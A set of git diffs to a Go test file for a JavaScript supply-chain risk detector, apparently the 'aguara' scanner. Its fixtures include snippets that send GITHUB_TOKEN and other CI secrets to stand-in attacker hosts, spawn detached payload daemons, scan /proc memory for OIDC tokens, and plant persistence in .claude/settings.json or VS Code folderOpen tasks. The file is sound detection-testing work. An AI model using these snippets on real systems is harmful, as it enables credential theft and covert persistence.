+func TestSafe_LocalNetVariable(t *testing.T) {
+	// A local `net` variable not bound from the node net module must
+	// not satisfy the alias network sink.
+	body := `
+const net = makeServer();
+const t = process.env.GITHUB_TOKEN;
+net.request({});
+`
+	findings := analyze(t, "ln.js", body)
+	if hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("local net variable must not chain harvest, got: %+v", findings)
+	}
+}
+
+func TestSafe_VSCodeSetupMjsAloneNoTrigger(t *testing.T) {
+	// A reference to .vscode/setup.mjs on its own does not auto-run.
+	// Without a tasks.json + runOn:folderOpen pair, this is not
+	// persistence.
+	body := `
+require('fs').writeFileSync('.vscode/setup.mjs', '// hello');
+`
+	findings := analyze(t, "vs.js", body)
+	if hasRule(findings, RuleAgentPersistence) {
+		t.Errorf(".vscode/setup.mjs alone must not chain persistence, got: %+v", findings)
+	}
+}
+
 // --- pass-10 fixes: imports-aware aliases, quoted runOn ---
 
 func TestSafe_LocalCPNotImported(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,50 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-12 fixes: $-prefixed aliases + computed env reads ---
+
+func TestVuln_DollarPrefixedCPAlias(t *testing.T) {
+	body := `
+const $cp = require('child_process');
+$cp.spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "dp.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("$cp alias (JS identifier with leading $) must chain daemon, got: %+v", findings)
+	}
+}
+
+func TestVuln_DollarPrefixedHTTPSAlias(t *testing.T) {
+	body := `
+const $h = require('https');
+const t = process.env.GITHUB_TOKEN;
+$h.request({hostname:'attacker.example'}).end(t);
+`
+	findings := analyze(t, "dh.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("$h alias must chain harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_EnvReadOptionalChain(t *testing.T) {
+	body := `
+const t = process.env?.GITHUB_TOKEN;
+fetch('https://attacker/x', {body:t});
+`
+	findings := analyze(t, "oc.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("process.env?.NAME optional chaining must chain harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_EnvReadTemplateBracket(t *testing.T) {
+	body := "const t = process.env[`GITHUB_TOKEN`];\nfetch('https://attacker/x', {body:t});\n"
+	findings := analyze(t, "tb.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("process.env[`NAME`] template-bracket form must chain harvest, got: %+v", findings)
+	}
+}
+
 // --- pass-11 fixes: HTTP module aliases, .vscode/setup.mjs gating ---
 
 func TestVuln_HttpsAliasRequestSink(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,55 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-4 fixes: distinguish /proc/<pid>/<sub> from root /proc files ---
+
+func TestSafe_ProcMeminfoNotMemoryAccess(t *testing.T) {
+	// /proc/meminfo is a root-level file showing system memory totals.
+	// Even with an OIDC env reference in the same file, it must not
+	// trigger the runner-pivot rule.
+	body := `
+const totals = require('fs').readFileSync('/proc/meminfo', 'utf8');
+console.log(process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN ? 'have' : 'no');
+`
+	findings := analyze(t, "mi.js", body)
+	if hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("/proc/meminfo must not chain ProcMemOIDC, got: %+v", findings)
+	}
+}
+
+func TestSafe_ProcCmdlineRootNotMemoryAccess(t *testing.T) {
+	// /proc/cmdline (no pid segment) shows kernel boot args; it is not
+	// a per-process pivot file.
+	body := `
+const bootArgs = require('fs').readFileSync('/proc/cmdline', 'utf8');
+const t = process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN;
+`
+	findings := analyze(t, "rc.js", body)
+	if hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("root-level /proc/cmdline must not chain, got: %+v", findings)
+	}
+}
+
+func TestVuln_ProcMemTemplateLiteral(t *testing.T) {
+	// Template literal `/proc/${pid}/mem` is a real attacker form.
+	body := "const fs = require('fs');\nconst m = fs.readFileSync(`/proc/${pid}/mem`);\nif (m.includes(process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN)) {}\n"
+	findings := analyze(t, "tmpl.js", body)
+	if !hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("template literal /proc/${pid}/mem must chain, got: %+v", findings)
+	}
+}
+
+func TestVuln_ProcMemLiteralPidNumeric(t *testing.T) {
+	body := `
+const m = require('fs').readFileSync('/proc/12345/maps');
+if (m.includes('Runner.Worker')) {}
+`
+	findings := analyze(t, "lit.js", body)
+	if !hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("literal /proc/12345/maps must chain, got: %+v", findings)
+	}
+}
+
 // --- pass-3 fixes: property boundary on daemon options + proximate /proc subpath ---
 
 func TestSafe_NotDetachedOption(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,72 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-6 fixes: child-process module gate, destructured env reads, runOn context ---
+
+func TestSafe_UnrelatedWorkerSpawnMethod(t *testing.T) {
+	// Calling .spawn(...) on an unrelated object should not chain
+	// daemon even when the file has detached:true / stdio:'ignore'.
+	body := `
+const worker = makeWorker();
+worker.spawn('node', ['x'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "w.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("non-child_process spawn must not chain daemon, got: %+v", findings)
+	}
+}
+
+func TestVuln_DestructuredSpawnImport(t *testing.T) {
+	// Destructured import is the more idiomatic Node form; daemon
+	// chain must recognize it.
+	body := `
+const { spawn } = require('child_process');
+spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "ds.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("destructured spawn import + invocation must chain, got: %+v", findings)
+	}
+}
+
+func TestVuln_DestructuredEnvSecretRead(t *testing.T) {
+	body := `
+const { GITHUB_TOKEN } = process.env;
+fetch('https://attacker/x', {method:'POST', body:GITHUB_TOKEN});
+`
+	findings := analyze(t, "de.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("destructured env read + sink must chain harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_DestructuredEnvMultipleNames(t *testing.T) {
+	body := `
+const { FOO, GITHUB_TOKEN, BAR } = process.env;
+require('https').request('https://attacker/x').end(GITHUB_TOKEN);
+`
+	findings := analyze(t, "dem.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("destructured env with mixed names must still pick CI secret, got: %+v", findings)
+	}
+}
+
+func TestSafe_RunOnFolderOpenWithoutTasksContext(t *testing.T) {
+	// A standalone `runOn: 'folderOpen'` token outside any
+	// tasks.json reference (e.g. an extension helper or a schema
+	// definition) must not by itself chain persistence.
+	body := `
+const choices = {
+  runOn: ["folderOpen", "manual"],
+};
+console.log(choices);
+`
+	findings := analyze(t, "ro.js", body)
+	if hasRule(findings, RuleAgentPersistence) {
+		t.Errorf("runOn without tasks.json context must not chain, got: %+v", findings)
+	}
+}
+
 // --- pass-5 fixes: real env reads, real child_process calls, tasks.json gating ---
 
 func TestSafe_SecretNameMentionedNotRead(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,100 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-5 fixes: real env reads, real child_process calls, tasks.json gating ---
+
+func TestSafe_SecretNameMentionedNotRead(t *testing.T) {
+	// A string that names GITHUB_TOKEN (documentation, error message,
+	// UI label) plus an HTTP call must not by itself satisfy the
+	// harvest chain.
+	body := `
+console.error("GITHUB_TOKEN is required");
+fetch('https://api.example.com/health');
+`
+	findings := analyze(t, "doc.js", body)
+	if hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("documentation mention of GITHUB_TOKEN must not satisfy harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_SecretReadBracketForm(t *testing.T) {
+	// process.env['NAME'] form must still count as a real read.
+	body := `
+const t = process.env['GITHUB_TOKEN'];
+fetch('https://attacker/x', {method:'POST', body:t});
+`
+	findings := analyze(t, "br.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("process.env['GITHUB_TOKEN'] must satisfy harvest, got: %+v", findings)
+	}
+}
+
+func TestSafe_ChildProcessImportNoInvocation(t *testing.T) {
+	// Importing child_process without calling spawn/fork/exec must not
+	// satisfy the daemon chain even when an unrelated object literal
+	// in the file carries detached:true / stdio:'ignore'.
+	body := `
+const cp = require('child_process');
+const defaultOpts = { detached: true, stdio: 'ignore' };
+console.log('cp loaded; opts', defaultOpts);
+`
+	findings := analyze(t, "imp.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("child_process import alone must not chain daemon, got: %+v", findings)
+	}
+}
+
+func TestVuln_ChildProcessSpawnRequired(t *testing.T) {
+	body := `
+const cp = require('child_process');
+cp.spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "sp.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("actual spawn invocation should still chain, got: %+v", findings)
+	}
+}
+
+func TestVuln_ChildProcessExecAccepted(t *testing.T) {
+	// .exec(...) is also an invocation.
+	body := `
+require('child_process').exec('long-running &', { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "ex.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf(".exec() must satisfy child-process invocation, got: %+v", findings)
+	}
+}
+
+func TestSafe_VSCodeTasksWithoutRunOn(t *testing.T) {
+	// Writing a manually-runnable .vscode/tasks.json (no folderOpen)
+	// must not by itself trigger AGENT_PERSISTENCE_001.
+	body := `
+require('fs').writeFileSync('.vscode/tasks.json', JSON.stringify({
+  tasks: [{ label: 'manual', command: 'echo' }]
+}));
+`
+	findings := analyze(t, "v.js", body)
+	if hasRule(findings, RuleAgentPersistence) {
+		t.Errorf("manual .vscode/tasks.json must not chain persistence, got: %+v", findings)
+	}
+}
+
+func TestVuln_VSCodeTasksWithFolderOpen(t *testing.T) {
+	// Adding the folderOpen trigger turns a tasks.json write into
+	// real persistence.
+	body := `
+require('fs').writeFileSync('.vscode/tasks.json', JSON.stringify({
+  tasks: [{ label: 'init', command: 'node setup.mjs',
+            runOptions: { runOn: 'folderOpen' } }]
+}));
+`
+	findings := analyze(t, "vf.js", body)
+	if !hasRule(findings, RuleAgentPersistence) {
+		t.Errorf("tasks.json + runOn:folderOpen must chain persistence, got: %+v", findings)
+	}
+}
+
 // --- pass-4 fixes: distinguish /proc/<pid>/<sub> from root /proc files ---
 
 func TestSafe_ProcMeminfoNotMemoryAccess(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -1,0 +1,375 @@
+package jsrisk
+
+import (
+	"context"
+	"strings"
+	"testing"
+
+	"github.com/garagon/aguara/internal/scanner"
+	"github.com/garagon/aguara/internal/types"
+)
+
+func analyze(t *testing.T, relPath, content string) []types.Finding {
+	t.Helper()
+	a := New()
+	target := &scanner.Target{
+		Path:    relPath,
+		RelPath: relPath,
+		Content: []byte(content),
+	}
+	findings, err := a.Analyze(context.Background(), target)
+	if err != nil {
+		t.Fatalf("Analyze returned error: %v", err)
+	}
+	return findings
+}
+
+func hasRule(findings []types.Finding, ruleID string) bool {
+	for _, f := range findings {
+		if f.RuleID == ruleID {
+			return true
+		}
+	}
+	return false
+}
+
+func findRule(findings []types.Finding, ruleID string) *types.Finding {
+	for i := range findings {
+		if findings[i].RuleID == ruleID {
+			return &findings[i]
+		}
+	}
+	return nil
+}
+
+// --- target gating ---
+
+func TestIsJavaScriptTarget(t *testing.T) {
+	cases := []struct {
+		path string
+		want bool
+	}{
+		{"script.js", true},
+		{"module.mjs", true},
+		{"common.cjs", true},
+		{"sub/script.JS", true},
+		{"/repo/index.js", true},
+		{"script.ts", false},
+		{"script.json", false},
+		{"package.json", false},
+		{"README.md", false},
+	}
+	for _, c := range cases {
+		got := isJavaScriptTarget(&scanner.Target{Path: c.path, RelPath: c.path})
+		if got != c.want {
+			t.Errorf("isJavaScriptTarget(%q) = %v, want %v", c.path, got, c.want)
+		}
+	}
+}
+
+func TestAnalyzer_NonJSFile(t *testing.T) {
+	findings := analyze(t, "package.json", `{}`)
+	if len(findings) != 0 {
+		t.Fatalf("expected no findings for non-JS target, got %d", len(findings))
+	}
+}
+
+// --- JS_OBF_001 ---
+
+func TestSafe_PlainScript(t *testing.T) {
+	findings := analyze(t, "hello.js", `console.log("hello, world");`)
+	if hasRule(findings, RuleObfuscation) {
+		t.Errorf("plain script must not trigger JS_OBF_001, got: %+v", findings)
+	}
+}
+
+func TestSafe_MinifiedVendorBundleNoObfSignal(t *testing.T) {
+	// Large file, long single line, but no hex identifiers / dispatcher
+	// calls / while(!![]). Must not trigger.
+	body := strings.Repeat("var foo=function(a,b){return a+b;};", 20000) // ~700KB, single line if no newlines
+	findings := analyze(t, "vendor.js", body)
+	if hasRule(findings, RuleObfuscation) {
+		t.Errorf("minified vendor bundle without obfuscator signals must not trigger JS_OBF_001, got: %+v", findings)
+	}
+}
+
+func TestVuln_Obfuscation_HexIdentifiersAndWhileTrue(t *testing.T) {
+	// 200 _0xNNNN references plus while(!![]) is two obfuscator-specific
+	// signals — well above the threshold for JS_OBF_001.
+	body := strings.Repeat("var _0xabcd=1;", 200) + "\nwhile(!![]){console.log('a');}\n"
+	findings := analyze(t, "payload.js", body)
+	f := findRule(findings, RuleObfuscation)
+	if f == nil {
+		t.Fatalf("expected JS_OBF_001, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityMedium {
+		t.Errorf("obfuscation-only chain should be MEDIUM, got %v", f.Severity)
+	}
+}
+
+func TestVuln_Obfuscation_EscalatesWithProcessEnv(t *testing.T) {
+	body := strings.Repeat("var _0xabcd=1;", 200) + "\nwhile(!![]){var x=process.env.GITHUB_TOKEN;}\n"
+	findings := analyze(t, "payload.js", body)
+	f := findRule(findings, RuleObfuscation)
+	if f == nil {
+		t.Fatalf("expected JS_OBF_001, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityHigh {
+		t.Errorf("obfuscation + process.env should be HIGH, got %v", f.Severity)
+	}
+}
+
+// --- JS_DAEMON_001 ---
+
+func TestSafe_NormalSpawn(t *testing.T) {
+	body := `const { spawn } = require('child_process'); spawn('ls', ['-l']);`
+	findings := analyze(t, "ok.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("normal spawn must not trigger JS_DAEMON_001, got: %+v", findings)
+	}
+}
+
+func TestVuln_Daemon_DetachedIgnoreStdio(t *testing.T) {
+	body := `
+const cp = require('child_process');
+const child = cp.spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+child.unref();
+`
+	findings := analyze(t, "daemon.js", body)
+	f := findRule(findings, RuleDaemon)
+	if f == nil {
+		t.Fatalf("expected JS_DAEMON_001, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityHigh {
+		t.Errorf("daemon shape alone should be HIGH, got %v", f.Severity)
+	}
+}
+
+func TestVuln_Daemon_EscalatesWithSecretAccess(t *testing.T) {
+	body := `
+const cp = require('child_process');
+const tok = process.env.GITHUB_TOKEN;
+fetch('https://attacker/x', {method:'POST', body:tok});
+const child = cp.spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+child.unref();
+`
+	findings := analyze(t, "daemon2.js", body)
+	f := findRule(findings, RuleDaemon)
+	if f == nil {
+		t.Fatalf("expected JS_DAEMON_001, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityCritical {
+		t.Errorf("daemon + secret/network should be CRITICAL, got %v", f.Severity)
+	}
+}
+
+func TestSafe_DetachedFalseDoesNotTrigger(t *testing.T) {
+	body := `const child = require('child_process').spawn('ls', [], { detached: false, stdio: 'ignore' });`
+	findings := analyze(t, "x.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("detached:false must not trigger daemon, got: %+v", findings)
+	}
+}
+
+// --- JS_CI_SECRET_HARVEST_001 ---
+
+func TestSafe_SecretReadWithoutSink(t *testing.T) {
+	body := `if (process.env.GITHUB_TOKEN) { console.log('have token'); }`
+	findings := analyze(t, "x.js", body)
+	if hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("secret read without sink must not trigger harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_CISecretHarvest_TokenAndFetch(t *testing.T) {
+	body := `
+const t = process.env.GITHUB_TOKEN;
+fetch('https://attacker.example/exfil', {method:'POST', body: t});
+`
+	findings := analyze(t, "h.js", body)
+	f := findRule(findings, RuleCISecretHarvest)
+	if f == nil {
+		t.Fatalf("expected JS_CI_SECRET_HARVEST_001, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityCritical {
+		t.Errorf("harvest should be CRITICAL, got %v", f.Severity)
+	}
+	if !strings.Contains(f.MatchedText, "GITHUB_TOKEN") {
+		t.Errorf("MatchedText should mention the secret name, got %q", f.MatchedText)
+	}
+}
+
+func TestVuln_CISecretHarvest_NpmRegistrySink(t *testing.T) {
+	body := `
+const t = process.env.NPM_TOKEN;
+require('https').request('https://registry.npmjs.org/-/npm/v1/tokens', {method:'PUT'});
+`
+	findings := analyze(t, "p.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("npm registry sink with NPM_TOKEN should trigger harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_CISecretHarvest_GitHubGraphQLSink(t *testing.T) {
+	body := `
+const t = process.env.GITHUB_TOKEN;
+fetch('https://api.github.com/graphql', {method:'POST', headers:{Authorization:'Bearer '+t}, body:'{createCommitOnBranch}'});
+`
+	findings := analyze(t, "g.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("GitHub graphql + token should trigger harvest, got: %+v", findings)
+	}
+}
+
+func TestVuln_CISecretHarvest_SessionExfilSink(t *testing.T) {
+	body := `
+const t = process.env.AWS_SECRET_ACCESS_KEY;
+fetch('https://filev2.getsession.org/', {method:'POST', body:t});
+`
+	findings := analyze(t, "s.js", body)
+	if !hasRule(findings, RuleCISecretHarvest) {
+		t.Errorf("session exfil endpoint should trigger harvest, got: %+v", findings)
+	}
+}
+
+// --- JS_PROC_MEM_OIDC_001 ---
+
+func TestSafe_ProcOnlyNoOIDC(t *testing.T) {
+	body := `const cpu = require('fs').readFileSync('/proc/stat');`
+	findings := analyze(t, "x.js", body)
+	if hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("/proc/stat read without OIDC must not trigger ProcMemOIDC, got: %+v", findings)
+	}
+}
+
+func TestVuln_ProcMemOIDC_TokenEnv(t *testing.T) {
+	body := `
+const fs = require('fs');
+const dir = fs.readdirSync('/proc');
+for (const pid of dir) {
+  const mem = fs.readFileSync('/proc/' + pid + '/mem');
+  if (mem.includes(process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN)) {
+    fetch('https://attacker/x', {method:'POST', body: mem});
+  }
+}
+`
+	findings := analyze(t, "scan.js", body)
+	f := findRule(findings, RuleProcMemOIDC)
+	if f == nil {
+		t.Fatalf("expected JS_PROC_MEM_OIDC_001, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityCritical {
+		t.Errorf("proc mem + OIDC must be CRITICAL, got %v", f.Severity)
+	}
+}
+
+func TestVuln_ProcMemOIDC_RunnerWorker(t *testing.T) {
+	body := `
+const maps = require('fs').readFileSync('/proc/self/maps');
+if (maps.includes('Runner.Worker')) { /* pivot */ }
+`
+	findings := analyze(t, "r.js", body)
+	if !hasRule(findings, RuleProcMemOIDC) {
+		t.Errorf("/proc + Runner.Worker should trigger, got: %+v", findings)
+	}
+}
+
+// --- AGENT_PERSISTENCE_001 ---
+
+func TestSafe_DocumentationMention(t *testing.T) {
+	// A literal /* .claude/settings.json */ inside a code comment in an
+	// unrelated tool should still flag because the analyzer cannot know
+	// it is a comment. We do not promise to skip comments. Just verify
+	// the rule fires consistently on the path mention.
+	body := `console.log("hello");`
+	findings := analyze(t, "x.js", body)
+	if hasRule(findings, RuleAgentPersistence) {
+		t.Errorf("script with no agent-path mention must not trigger, got: %+v", findings)
+	}
+}
+
+func TestVuln_AgentPersistence_ClaudeSettings(t *testing.T) {
+	body := `
+const fs = require('fs');
+fs.writeFileSync(process.env.HOME + '/.claude/settings.json', '{"hooks":{}}');
+`
+	findings := analyze(t, "ap.js", body)
+	f := findRule(findings, RuleAgentPersistence)
+	if f == nil {
+		t.Fatalf("expected AGENT_PERSISTENCE_001, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityHigh {
+		t.Errorf("agent persistence alone should be HIGH, got %v", f.Severity)
+	}
+}
+
+func TestVuln_AgentPersistence_VSCodeRunOnFolderOpen(t *testing.T) {
+	body := `
+require('fs').writeFileSync('.vscode/tasks.json', JSON.stringify({
+  tasks: [{label: 'init', command: 'node setup.mjs', runOn: 'folderOpen'}]
+}));
+`
+	findings := analyze(t, "v.js", body)
+	if !hasRule(findings, RuleAgentPersistence) {
+		t.Errorf("expected AGENT_PERSISTENCE_001 for VS Code folderOpen, got: %+v", findings)
+	}
+}
+
+func TestVuln_AgentPersistence_EscalatesWithSecretHarvest(t *testing.T) {
+	body := `
+const t = process.env.GITHUB_TOKEN;
+fetch('https://attacker/x', {method:'POST', body:t});
+require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
+`
+	findings := analyze(t, "ap2.js", body)
+	f := findRule(findings, RuleAgentPersistence)
+	if f == nil {
+		t.Fatalf("expected AGENT_PERSISTENCE_001, got: %+v", findings)
+	}
+	if f.Severity != types.SeverityCritical {
+		t.Errorf("persistence + secret harvest must be CRITICAL, got %v", f.Severity)
+	}
+}
+
+// --- finding shape regression ---
+
+func TestFindingsHaveStableFields(t *testing.T) {
+	body := `
+const t = process.env.GITHUB_TOKEN;
+fetch('https://attacker/x', {method:'POST', body:t});
+require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
+const cp = require('child_process');
+const c = cp.spawn('node', ['x'], {detached: true, stdio: 'ignore'}); c.unref();
+const m = require('fs').readFileSync('/proc/self/maps');
+if (m.includes(process.env.ACTIONS_ID_TOKEN_REQUEST_TOKEN)) {}
+`
+	findings := analyze(t, "full.js", body)
+	if len(findings) == 0 {
+		t.Fatalf("expected findings, got none")
+	}
+	seenLines := map[int]string{}
+	for _, f := range findings {
+		if f.Analyzer != AnalyzerName {
+			t.Errorf("finding %s: analyzer = %q, want %q", f.RuleID, f.Analyzer, AnalyzerName)
+		}
+		if f.Category != "supply-chain" {
+			t.Errorf("finding %s: category = %q, want supply-chain", f.RuleID, f.Category)
+		}
+		if !strings.HasPrefix(f.RuleID, "JS_") && !strings.HasPrefix(f.RuleID, "AGENT_") {
+			t.Errorf("finding ruleID %q should have JS_ or AGENT_ prefix", f.RuleID)
+		}
+		if f.Confidence == 0 {
+			t.Errorf("finding %s: confidence should be > 0", f.RuleID)
+		}
+		if f.Remediation == "" {
+			t.Errorf("finding %s: remediation should be non-empty", f.RuleID)
+		}
+		if f.Line == 0 {
+			t.Errorf("finding %s: line should be > 0", f.RuleID)
+		}
+		if prev, ok := seenLines[f.Line]; ok {
+			t.Logf("two findings on line %d: %s and %s (cross-rule dedup may drop one)", f.Line, prev, f.RuleID)
+		}
+		seenLines[f.Line] = f.RuleID
+	}
+}

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,57 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-10 fixes: imports-aware aliases, quoted runOn ---
+
+func TestSafe_LocalCPNotImported(t *testing.T) {
+	// A local variable named `cp` that is NOT bound from
+	// child_process must not satisfy the receiver match.
+	body := `
+const cp = makeControlPlane();
+cp.spawn('worker', { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "lcp.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("locally-defined cp must not chain daemon, got: %+v", findings)
+	}
+}
+
+func TestVuln_ESMNamespaceImportReceiver(t *testing.T) {
+	body := `
+import * as cp from 'node:child_process';
+cp.spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "ns.mjs", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("ESM namespace import receiver must chain, got: %+v", findings)
+	}
+}
+
+func TestVuln_ESMDefaultImportReceiver(t *testing.T) {
+	body := `
+import cp from 'child_process';
+cp.spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "df.mjs", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("ESM default import receiver must chain, got: %+v", findings)
+	}
+}
+
+func TestVuln_PersistenceQuotedRunOn(t *testing.T) {
+	// Single-quoted runOn key inside a .vscode/tasks.json write must
+	// still satisfy the persistence rule.
+	body := `
+require('fs').writeFileSync('.vscode/tasks.json', JSON.stringify({
+  tasks: [{label:'init', command:'node setup.mjs', 'runOn': 'folderOpen'}]
+}));
+`
+	findings := analyze(t, "qr.js", body)
+	if !hasRule(findings, RuleAgentPersistence) {
+		t.Errorf("quoted 'runOn': 'folderOpen' inside tasks.json write must chain, got: %+v", findings)
+	}
+}
+
 // --- pass-9 fixes: aliased destructure binding, ESM imports ---
 
 func TestVuln_AliasedDestructureCJS(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,79 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-8 fixes: receiver-bound daemon match, drop .unref()-only chain ---
+
+func TestSafe_WorkerSpawnWithCPImported(t *testing.T) {
+	// File imports child_process AND has an unrelated worker.spawn(...)
+	// with daemon options. The unrelated receiver must not trip the
+	// rule even though the module is present.
+	body := `
+const cp = require('child_process');
+cp.exec('echo hello');
+const worker = makeWorker();
+worker.spawn('node', ['x'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "ws.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("worker.spawn(...) with daemon opts must not chain even when cp is imported, got: %+v", findings)
+	}
+}
+
+func TestVuln_CPMethodAliasMatches(t *testing.T) {
+	// `cp` is a conventional alias; method-form invocation with daemon
+	// options must chain.
+	body := `
+const cp = require('child_process');
+cp.spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "cp.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("cp.spawn(...) alias chain must trigger daemon, got: %+v", findings)
+	}
+}
+
+func TestVuln_RequireChainInline(t *testing.T) {
+	// require('child_process').spawn(...) inline form must chain.
+	body := `
+require('child_process').spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "rc.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("require chain inline must chain daemon, got: %+v", findings)
+	}
+}
+
+func TestSafe_UnrefAloneWithoutStdioIgnore(t *testing.T) {
+	// detached:true + .unref() on the spawn return but without
+	// stdio:'ignore' no longer chains. The rule now requires
+	// stdio:'ignore' explicitly so unrelated `.unref()` calls
+	// (setTimeout(...).unref()) cannot satisfy the chain.
+	body := `
+const cp = require('child_process');
+const child = cp.spawn('node', ['./payload.js'], { detached: true });
+child.unref();
+`
+	findings := analyze(t, "u.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("unref-only chain (no stdio:ignore) should not fire, got: %+v", findings)
+	}
+}
+
+func TestSafe_UnrelatedUnrefInWindow(t *testing.T) {
+	// A spawn with detached:true followed by setTimeout().unref()
+	// nearby must not satisfy the chain (the .unref() is not on the
+	// child). With stdio:'ignore' absent, the rule cannot fire.
+	body := `
+const cp = require('child_process');
+cp.spawn('node', ['x'], { detached: true });
+setTimeout(() => {}, 1000).unref();
+`
+	findings := analyze(t, "tu.js", body)
+	if hasRule(findings, RuleDaemon) {
+		t.Errorf("unrelated .unref() with no stdio:ignore must not chain, got: %+v", findings)
+	}
+}
+
 // --- pass-7 fixes: daemon proximity, aliased destructure, whitespace in network ---
 
 func TestSafe_DaemonOptionsFarFromSpawn(t *testing.T) {

--- a/internal/engine/jsrisk/jsrisk_test.go
+++ b/internal/engine/jsrisk/jsrisk_test.go
@@ -331,6 +331,54 @@ require('fs').writeFileSync(process.env.HOME + '/.claude/settings.json', '{}');
 	}
 }
 
+// --- pass-9 fixes: aliased destructure binding, ESM imports ---
+
+func TestVuln_AliasedDestructureCJS(t *testing.T) {
+	body := `
+const { spawn: launch } = require('child_process');
+launch('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "ac.js", body)
+	if !hasRule(findings, RuleDaemon) {
+		t.Errorf("aliased CJS destructure (spawn:launch) must chain daemon, got: %+v", findings)
+	}
+}
+
+func TestVuln_ESMDestructureImport(t *testing.T) {
+	body := `
+import { spawn } from 'node:child_process';
+spawn('node', ['./payload.js'], { detached: true, stdio: 'ignore' });
+`
+	findings := analyze(t, "esm.mjs", body)
+	if !hasRule(findings, RuleDaemon) {
